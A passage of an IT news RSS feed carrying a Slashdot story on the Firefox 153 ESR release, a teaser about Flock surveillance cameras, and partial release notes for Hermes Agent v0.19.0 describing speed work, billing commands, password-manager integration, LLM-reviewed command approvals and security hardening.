<content:encoded><![CDATA[Longtime Slashdot reader williamyf writes: FireFox 153 was released today. The most important user-facing changes are improvements to PDF handling (you can now merge PDFs and add images to them), and HDR video playback (on Windows, provided HDR is active systemwide). Other under-the-hood changes include browser-wide containers and QWAC support. The full list is in the change notes.

 But the most important feature is that this version is an ESR and, therefore, defines the ESR feature set for the next year. Why is being an ESR so important, you ask?

 1.) ESR, rather than "normal" (a.k.a. Rapid Release), Firefox is the out-of-the-box browser for many important distros, including Debian, RHEL, Kali, Tails, SUSE Linux Enterprise, Slackware, and others.

 2.) Many organizations, large and small, standardize on Firefox ESR as their default browser, regardless of the default browser included with their OS.

 3.) Firefox ESR is the basis for many downstream projects, such as Waterfox and KaiOS. All these projects will inherit, for a year, whatever ESR brings to the table today.

 4.) Many ISVs and SaaS providers, if they certify their wares for Firefox at all, certify for the ESR version only.

 Please note that ESR 153 will not be offered as an automatic update until two months from now (ESR 140 will still be supported). If you want it now, you will need to download and install it manually.

 Also of note, ESR 115 will be supported until March 2027. If you use an unsupported version of macOS or Windows (like Windows 7 or 8.x), this is the version to get. However, even Mozilla cautions against running a supported browser on an unsupported OS: "Note that Microsoft ended official support for Windows 7, 8, and 8.1 in January 2023. Unsupported operating systems receive no security updates and have known vulnerabilities. Without official support from Microsoft, maintaining Firefox for outdated operating systems becomes costly for Mozilla and risky for users."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Firefox+153+Released%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F21%2F2022247%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F21%2F2022247%2Ffirefox-153-released%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/21/2022247/firefox-153-released?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[90,000 Flock cameras have quietly gone up in the US: What they track and how to check your city]]></title>
<description><![CDATA[Flock cameras are everywhere - even in my small town, quietly using AI to identify your car and surveil your movements. But did you consent? Probably not.]]></description>
<link>https://tsecurity.de/de/3684156/it-nachrichten/90000-flock-cameras-have-quietly-gone-up-in-the-us-what-they-track-and-how-to-check-your-city/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684156/it-nachrichten/90000-flock-cameras-have-quietly-gone-up-in-the-us-what-they-track-and-how-to-check-your-city/</guid>
<pubDate>Tue, 21 Jul 2026 17:22:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Flock cameras are everywhere - even in my small town, quietly using AI to identify your car and surveil your movements. But did you consent? Probably not.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.19.0 (2026.7.20) — The Quicksilver Release]]></title>
<description><![CDATA[Hermes Agent v0.19.0 (v2026.7.20)
Release Date: July 20, 2026
Since v0.18.0: ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · ~3,300 issues closed · 450+ community contributors

The Quicksilver Release. Hermes is the messenger god, and this win...]]></description>
<link>https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</guid>
<pubDate>Mon, 20 Jul 2026 20:46:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.19.0 (v2026.7.20)</h1>
<p><strong>Release Date:</strong> July 20, 2026<br>
<strong>Since v0.18.0:</strong> ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · <strong>~3,300 issues closed</strong> · <strong>450+ community contributors</strong></p>
<blockquote>
<p><strong>The Quicksilver Release.</strong> Hermes is the messenger god, and this window we made him move like it. First-turn time-to-first-token dropped <strong>~80% on every platform</strong>, reasoning streams live by default, the desktop app got a ~20-PR speed overhaul (14× faster streaming markdown, virtualized diffs, snappy session switching), and the TUI renders markdown incrementally. Around that speed spine: you can now <strong>manage your Nous subscription without leaving the terminal</strong>, plug <strong>Bitwarden and 1Password</strong> straight into Hermes, let <strong>smart approvals</strong> judge flagged commands for you by default, <strong>watch your subagents work live</strong>, and trust that a finished response <strong>survives a gateway crash</strong> thanks to a durable delivery ledger. This release also rolls up everything from the v0.18.1 and v0.18.2 infrastructure patch tags — those windows are fully documented here.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes got dramatically faster — first token in a fraction of the time</strong> — Cold-start "Initializing agent..." used to eat ~4.3 seconds before your first turn even reached the model; it's now ~0.9s, an ~80% cut that applies to the CLI, gateway, TUI, desktop, and cron alike. Round 2 attacked what you <em>see</em> while waiting: reasoning models now stream their thinking live by default (no more staring at a spinner for 30 seconds), and the response box paints per token instead of per line. If Hermes ever felt like it took a deep breath before answering, that breath is gone. (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The desktop app speed wave — 20+ targeted perf PRs</strong> — Long replies used to cost 14× more CPU in the markdown splitter than they do now; giant diffs froze the review pane until we virtualized it; switching sessions thrashes layout no more. Streaming no longer re-renders the sidebar and every tool row per token, profile backends pre-warm on hover intent, and boot-hidden panes mount at idle instead of on the cold-start critical path. The net effect: the desktop app feels like a native app under load, even with huge transcripts and busy agents. (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a> and more — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Manage your Nous plan from the terminal — <code>/subscription</code> and <code>/topup</code></strong> — Changing your subscription used to mean a trip to the billing website. Now <code>/subscription</code> opens a full flow right in the TUI or classic CLI: see your plan and remaining allowance, preview exactly what an upgrade costs ("Pay $46.30 &amp; upgrade now") or when a downgrade takes effect, and apply it — with scheduled-change banners and undo. The desktop app got a matching billing settings tab. Your wallet never has to leave the keyboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/51639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51639/hovercard">#51639</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61054/hovercard">#61054</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61067/hovercard">#61067</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</p>
</li>
<li>
<p><strong>Smart approvals are now the default</strong> — When Hermes wants to run a flagged command, an LLM reviewer now assesses it independently instead of asking you to approve every single one — and each verdict covers only that exact command, so a later command matching the same pattern gets its own review. Combined with the new <strong>user-defined deny rules</strong> (which block commands even under yolo mode) and <code>/deny &lt;reason&gt;</code> (which tells the agent <em>why</em> you refused so it course-corrects), day-to-day approval fatigue drops sharply without giving up control. (<a href="https://github.com/NousResearch/hermes-agent/pull/62661" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62661/hovercard">#62661</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59164/hovercard">#59164</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54518/hovercard">#54518</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Plug your password manager into Hermes — Bitwarden &amp; 1Password secret sources</strong> — API keys no longer have to live in a plaintext <code>.env</code>. A new pluggable <code>SecretSource</code> interface lets Hermes fetch secrets from Bitwarden and 1Password (<code>op://</code> references) at load time, with multiple vaults enabled simultaneously, deterministic precedence, conflict warnings, and per-variable provenance. This consolidated eleven competing community PRs into one orchestrated interface — future vault providers drop in as plugins. (<a href="https://github.com/NousResearch/hermes-agent/pull/59498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59498/hovercard">#59498</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, 1Password provider salvaged from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>)</p>
</li>
<li>
<p><strong>Watch your subagents work — live transcripts + durable background delegation</strong> — <code>delegate_task</code> dispatches now return live transcript files you can <code>tail -f</code> the moment the subagents launch: every tool call, result, and streamed reply, one human-readable log per child. And background delegation completions are now <strong>durable</strong> — if the process restarts mid-run, results are restored and delivered through an ownership-checked ledger instead of vanishing. Fan out a fleet, watch any worker live, and never lose the results. (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A finished answer can no longer be lost — the delivery-obligation ledger</strong> — If the gateway died between generating your response and confirming the platform actually delivered it, that answer used to be silently gone (and you'd paid for the turn). Final responses are now recorded in a durable ledger in <code>state.db</code> around the platform send and <strong>redelivered on the next boot</strong> — closing a P1 silent-loss window for Telegram, Discord, Slack, and every other channel. (<a href="https://github.com/NousResearch/hermes-agent/pull/67181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67181/hovercard">#67181</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>One gateway, many profiles — profile-based message routing</strong> — A single multiplexed gateway sharing one bot token can now route specific guilds, channels, or threads to different profiles — each with fully isolated config, skills, memory, and secrets. Point your work Discord server at the <code>work</code> profile and your hobby server at <code>personal</code>, from one bot. A second multiplex hardening wave means one misconfigured profile can no longer take down the whole gateway. (<a href="https://github.com/NousResearch/hermes-agent/pull/64835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64835/hovercard">#64835</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Burgunthy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Burgunthy">@Burgunthy</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65700" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65700/hovercard">#65700</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60589" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60589/hovercard">#60589</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> + six salvaged contributors)</p>
</li>
<li>
<p><strong>New providers and the newest frontier models</strong> — Fireworks AI and DeepInfra land as first-class providers (Fireworks with cost estimation and a <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> slot in the provider picker), Upstage Solar joins via salvage, and the model catalogs picked up <strong>GPT-5.6 (Sol/Terra/Luna + Pro variants, wired end-to-end across every route)</strong>, <strong>grok-4.5 (GA)</strong>, <strong>moonshotai/kimi-k3</strong>, <strong>claude-fable-5 / claude-sonnet-5</strong>, and GA <strong>tencent/hy3</strong> — plus LM Studio JIT model loading for local setups. (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> completing <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>'s <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4848372503" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/61578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61578/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/61578">#61578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>)</p>
</li>
<li>
<p><strong>Crank the thinking to max — new reasoning effort tiers and per-model control</strong> — Reasoning effort gained <code>max</code> and <code>ultra</code> levels (GPT-5.6 and Codex's top tiers), selectable everywhere from the CLI to the desktop, with sane clamping on providers with smaller scales. You can now also pin <strong>per-model reasoning-effort overrides</strong> in config, set <strong>per-slot effort in MoA presets</strong> (your advisors think hard, your synthesizer stays fast), and per-task effort for auxiliary models. Thinking depth is now a dial, not a global switch. (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Your sessions, your data — export everything</strong> — <code>hermes sessions export</code> now writes Markdown, Quarto, HTML, prompt-only, and even Hugging Face-ready trace formats, with the full filter surface (age, workspace, platform), an opt-in <code>--redact</code> secret-scrubbing pass, and compacted-session lineage stitched into one logical export. Pair with the new prune filters and bulk archive to keep your session store tidy. Your conversation history is a real dataset now, not a black box. (<a href="https://github.com/NousResearch/hermes-agent/pull/60186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60186/hovercard">#60186</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60492/hovercard">#60492</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60507/hovercard">#60507</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59327/hovercard">#59327</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Security hardening round</strong> — This window closed a long list of credential-surface gaps: Vertex credentials scoped away from subprocess env and through profile secret scopes, media/vision/image-gen local-file reads routed through one shared credential-read guard, a webhook body-size-cap sweep across every aiohttp server, bot-token redaction in Telegram transport errors, Fireworks token prefixes added to the redactor, six P1 browser/MEDIA/.env hardening PRs salvaged in one pass, and CI hardened against untrusted-ref interpolation. (<a href="https://github.com/NousResearch/hermes-agent/pull/57660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57660/hovercard">#57660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58709" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58709/hovercard">#58709</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59215/hovercard">#59215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56582/hovercard">#56582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57842/hovercard">#57842</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>)</p>
</li>
</ul>
<hr>
<h2>⚡ Performance — the speed spine</h2>
<h3>First-turn latency (all platforms)</h3>
<ul>
<li><strong>~80% TTFT cut</strong> — Discord capability detection off the critical path (token-keyed 24h disk cache + background refresh), Ollama probe skipped for known non-Ollama providers, agent-init blocking work removed; cold submit→dispatch ~4.3s → ~0.9s (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Perceived-latency round 2</strong> — <code>display.show_reasoning</code> default ON (watch the model think instead of a spinner), per-token response-box painting with width-aware force-flush, prompt-build caching, mtime-cached timezone resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Segment mixed tool batches to recover lost concurrency; drop per-call base64 re-serialization from request-size estimates (<a href="https://github.com/NousResearch/hermes-agent/pull/64460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64460/hovercard">#64460</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67788" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67788/hovercard">#67788</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Desktop speed wave</h3>
<ul>
<li>14× less splitter CPU via incremental block lexing for streaming markdown; virtualized review-pane diffs (no more full-Shiki freeze); snappy session switching on large transcripts; killed the layout-thrash cascade on session switch (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Cut startup serialization + per-turn REST amplification; pre-warm profile backends and gateway sockets on hover intent; idle-mount boot-hidden panes; fast model picker + dialogs (<a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66347" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66347/hovercard">#66347</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67857" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67857/hovercard">#67857</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66470" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66470/hovercard">#66470</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Stop per-token sidebar + tool-row re-renders during streaming; stop eager JSON.stringify of every tool's args/result; scope tool-diff subscriptions; batch sidebar session slices into one profile-DB pass; targeted file-tree revalidation; rAF-coalesced sash resizes (<a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67842/hovercard">#67842</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67195" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67195/hovercard">#67195</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67245/hovercard">#67245</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67824/hovercard">#67824</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67838/hovercard">#67838</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67844" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67844/hovercard">#67844</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Systematized perf benchmark harness with trustworthy cold-start + first-token measurement, replacing 12 one-off scripts (<a href="https://github.com/NousResearch/hermes-agent/pull/67466" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67466/hovercard">#67466</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67697" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67697/hovercard">#67697</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Everywhere else</h3>
<ul>
<li>TUI renders streamed markdown incrementally per block (<a href="https://github.com/NousResearch/hermes-agent/pull/67236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67236/hovercard">#67236</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Skill discovery cached by scan signature; snapshot manifest builds ~5× faster; text prefilter before AST parse in tool discovery (<a href="https://github.com/NousResearch/hermes-agent/pull/61414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61414/hovercard">#61414</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61131/hovercard">#61131</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63941" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63941/hovercard">#63941</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
